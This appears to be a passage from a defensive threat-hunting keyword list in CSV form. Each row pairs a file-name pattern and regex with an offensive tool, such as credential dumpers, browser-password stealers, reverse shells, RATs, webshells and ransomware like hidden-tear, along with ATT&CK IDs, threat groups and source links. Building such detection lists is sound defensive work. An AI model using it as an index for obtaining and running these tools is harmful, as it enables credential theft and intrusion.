"*\gsecdump-*.exe*",".{0,1000}\\gsecdump\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15737" "*\gsecdump.exe*",".{0,1000}\\gsecdump\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15738" "*\gs-netcat ",".{0,1000}\\gs\-netcat\s","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15739" "*\gsocket-*.tar.gz*",".{0,1000}\\gsocket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15740" "*\gsocket_*_all.deb*",".{0,1000}\\gsocket_.{0,1000}_all\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15741" "*\gsocket_dso.so.*",".{0,1000}\\gsocket_dso\.so\..{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15742" "*\gs-sftp*",".{0,1000}\\gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15745" "*\gtfonow.py*",".{0,1000}\\gtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","15746" "*\Gupt-Backdoor.ps1*",".{0,1000}\\Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15748" "*\gwisinlocker.txt*",".{0,1000}\\gwisinlocker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15749" "*\GzipB64.exe*",".{0,1000}\\GzipB64\.exe.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","15750" "*\H Remote Admin 
Tools.exe*",".{0,1000}\\H\sRemote\sAdmin\sTools\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15751" "*\h0lygh0st.html*",".{0,1000}\\h0lygh0st\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15752" "*\h4ntu shell [powered by tsoi].php*",".{0,1000}\\h4ntu\sshell\s\[powered\sby\stsoi\]\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15753" "*\hack.ps1*",".{0,1000}\\hack\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","15754" "*\HackBrowserData*",".{0,1000}\\HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","15755" 
"*\hack-browser-data.exe*",".{0,1000}\\hack\-browser\-data\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15756" "*\hack-browser-data-linux-386.zip*",".{0,1000}\\hack\-browser\-data\-linux\-386\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15757" "*\hack-browser-data-linux-amd64.zip*",".{0,1000}\\hack\-browser\-data\-linux\-amd64\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15758" "*\hack-browser-data-linux-arm.zip*",".{0,1000}\\hack\-browser\-data\-linux\-arm\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15759" "*\hack-browser-data-linux-arm64.zip*",".{0,1000}\\hack\-browser\-data\-linux\-arm64\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15760" "*\hack-browser-data-osx-64bit.zip*",".{0,1000}\\hack\-browser\-data\-osx\-64bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15761" "*\hack-browser-data-windows-32bit.zip*",".{0,1000}\\hack\-browser\-data\-windows\-32bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15762" "*\hack-browser-data-windows-64bit.zip*",".{0,1000}\\hack\-browser\-data\-windows\-64bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15763" "*\Hades.exe*",".{0,1000}\\Hades\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database 
for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","15764" "*\hades.exe*",".{0,1000}\\hades\.exe.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","15765" "*\hades-main.zip*",".{0,1000}\\hades\-main\.zip.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","15766" "*\HAKOPS B?nder.exe*",".{0,1000}\\HAKOPS\sB\?nder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15767" "*\HAKOPS RAT.exe*",".{0,1000}\\HAKOPS\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15768" "*\HandleHijacker.cpp*",".{0,1000}\\HandleHijacker\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","15769" "*\HandleHijacker.hpp*",".{0,1000}\\HandleHijacker\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","15770" "*\handlekatz.exe*",".{0,1000}\\handlekatz\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15771" "*\handlekatz.py*",".{0,1000}\\handlekatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15772" "*\Harmmy Rat 
v1.*.exe*",".{0,1000}\\Harmmy\sRat\sv1\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15773" "*\harvest.cmb*",".{0,1000}\\harvest\.cmb.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","15774" "*\harvester64.o*",".{0,1000}\\harvester64\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15775" "*\harvester86.o*",".{0,1000}\\harvester86\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black 
Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15776" "*\hash_spider.py*",".{0,1000}\\hash_spider\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15777" "*\hashview.py*",".{0,1000}\\hashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","15778" "*\HavRat.exe*",".{0,1000}\\HavRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15779" "*\HellsHall.c*",".{0,1000}\\HellsHall\.c.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","15780" "*\HellsHall.exe*",".{0,1000}\\HellsHall\.exe.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","15781" "*\HellsHall.h*",".{0,1000}\\HellsHall\.h.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","15782" "*\HELP_SECURITY_EVENT.html*",".{0,1000}\\HELP_SECURITY_EVENT\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15783" "*\heroinn_client\*",".{0,1000}\\heroinn_client\\.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","15784" "*\hidden_tear.Form1.resources*",".{0,1000}\\hidden_tear\.Form1\.resources.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15785" "*\hidden-cmd.bat*",".{0,1000}\\hidden\-cmd\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - 
TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15786" "*\HiddenDesktop.h*",".{0,1000}\\HiddenDesktop\.h.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15787" "*\HiddenDesktop\*",".{0,1000}\\HiddenDesktop\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","15788" "*\hidden-tear.csproj*",".{0,1000}\\hidden\-tear\.csproj.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 
- T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15789" "*\hidden-tear.exe*",".{0,1000}\\hidden\-tear\.exe.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15790" "*\hidden-tear.pdb*",".{0,1000}\\hidden\-tear\.pdb.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15791" "*\hidden-tear.sln*",".{0,1000}\\hidden\-tear\.sln.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15792" "*\hidden-tear.vshost.exe*",".{0,1000}\\hidden\-tear\.vshost\.exe.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15793" "*\HiddenTear.zip*",".{0,1000}\\HiddenTear\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - 
T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15794" "*\hidden-tear-remake\*",".{0,1000}\\hidden\-tear\-remake\\.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15795" "*\HijackablePaths.cs*",".{0,1000}\\HijackablePaths\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","15796" "*\HijackDLL-CreateRemoteThread.*",".{0,1000}\\HijackDLL\-CreateRemoteThread\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","15797" "*\HijackDLL-CreateRemoteThread\*",".{0,1000}\\HijackDLL\-CreateRemoteThread\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","15798" "*\HijackDll-Process.*",".{0,1000}\\HijackDll\-Process\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM 
